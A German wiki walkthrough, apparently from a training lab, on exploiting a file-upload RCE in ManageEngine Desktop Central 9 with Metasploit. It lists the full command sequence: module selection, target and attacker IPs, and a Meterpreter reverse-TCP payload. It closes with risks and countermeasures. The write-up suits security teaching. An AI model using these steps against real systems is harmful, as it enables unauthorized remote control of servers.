Manager Central Schwachstelle

Aus Xinux Wiki
Zur Navigation springen Zur Suche springen

Details zur Schwachstelle: ManageEngine Desktop Central - FileUploadServlet ConnectionId Exploit

  • Schwachstelle: Unsichere Datei-Upload-Funktion in ManageEngine Desktop Central ermöglicht einem Angreifer die Ausführung von Remote-Code (RCE). Diese *Schwachstelle erlaubt es, speziell gestaltete Dateien hochzuladen, die vom Server ausgeführt werden, was zur Kompromittierung des Systems führt.
  • Angriffspunkt: Die Schwachstelle befindet sich im HTTP-Dienst von ManageEngine Desktop Central, der auf Port 8383 läuft. Ein Angreifer kann speziell gestaltete HTTP-Anfragen an den Server senden, um eine Datei hochzuladen und Code auszuführen.

Ausnutzung: Ein Angreifer kann ein Exploit-Modul (z. B. Metasploit) verwenden, um diese Schwachstelle auszunutzen und eine Reverse-Shell zu erhalten.

Warum dieser Exploit?

  • Ein Nmap-Scan des Zielsystems (10.0.10.107) ergab, dass der Port 8383 für den Apache HTTP-Dienst geöffnet ist, der von ManageEngine Desktop Central verwendet wird.
  • Wir haben die verfügbaren Exploits mit dem Befehl `searchsploit "ManageEngine Desktop Central 9"` durchsucht und festgestellt, dass der Exploit "ManageEngine Desktop Central 9 - FileUploadServlet ConnectionId (Metasploit)" (`jsp/remote/38982.rb`) speziell für die Version 9 von ManageEngine Desktop Central entwickelt wurde und bereits als Metasploit-Modul verfügbar ist. Dies machte es zu einer idealen Wahl für die Ausnutzung.

Schritte zur Ausnutzung

  • Starte die Metasploit-Konsole:
 msfconsole
  • Wähle das Exploit-Modul für den FileUploadServlet ConnectionId Exploit:
 use exploit/windows/http/manageengine_connectionid_write
  • Setze die Optionen für das Zielsystem und die Payload:
 set RHOST 10.0.10.107   # Ziel-IP-Adresse  
 set RPORT 8383          # Ziel-Port  
 set LHOST 10.0.10.101   # Angreifer-IP-Adresse für die Reverse-Shell  
 set LPORT 4444          # Lokaler Port für die Verbindung  
 set PAYLOAD windows/meterpreter/reverse_tcp  # Payload-Typ
  • Überprüfe die Optionen, um sicherzustellen, dass sie korrekt gesetzt sind:
 show options
  • Führe den Exploit aus:
 exploit
  • Überprüfe die Verbindung:

Wenn der Exploit erfolgreich ist, erhältst du eine Meterpreter-Sitzung. Von hier aus kannst du weitere Post-Exploitation-Schritte ausführen, wie z.B. Privilegien-Eskalation, Dateisystem durchsuchen, usw.

Warum ist diese Schwachstelle gefährlich?

  • Remote Code Execution (RCE): Ermöglicht es einem Angreifer, beliebige Befehle auf dem Zielsystem auszuführen.
  • Volle Kompromittierung: Ein erfolgreicher Angriff führt zur vollständigen Kontrolle des betroffenen Servers.
  • Einfacher Angriff auf ungeschützte Systeme: Ungepatchte Versionen von ManageEngine Desktop Central sind besonders gefährdet.

Gegenmaßnahmen

  • Aktualisiere ManageEngine Desktop Central auf die neueste Version, die diese Schwachstelle behebt.
  • Setze Web Application Firewalls (WAFs) und Intrusion Detection/Prevention Systems (IDS/IPS) ein, um bösartige Anfragen zu blockieren.
  • Deaktiviere unnötige Dienste und überprüfe die Konfigurationseinstellungen regelmäßig.
Abgerufen von „http://wiki.ixheim.de/index.php?title=Manager_Central_Schwachstelle&oldid=55931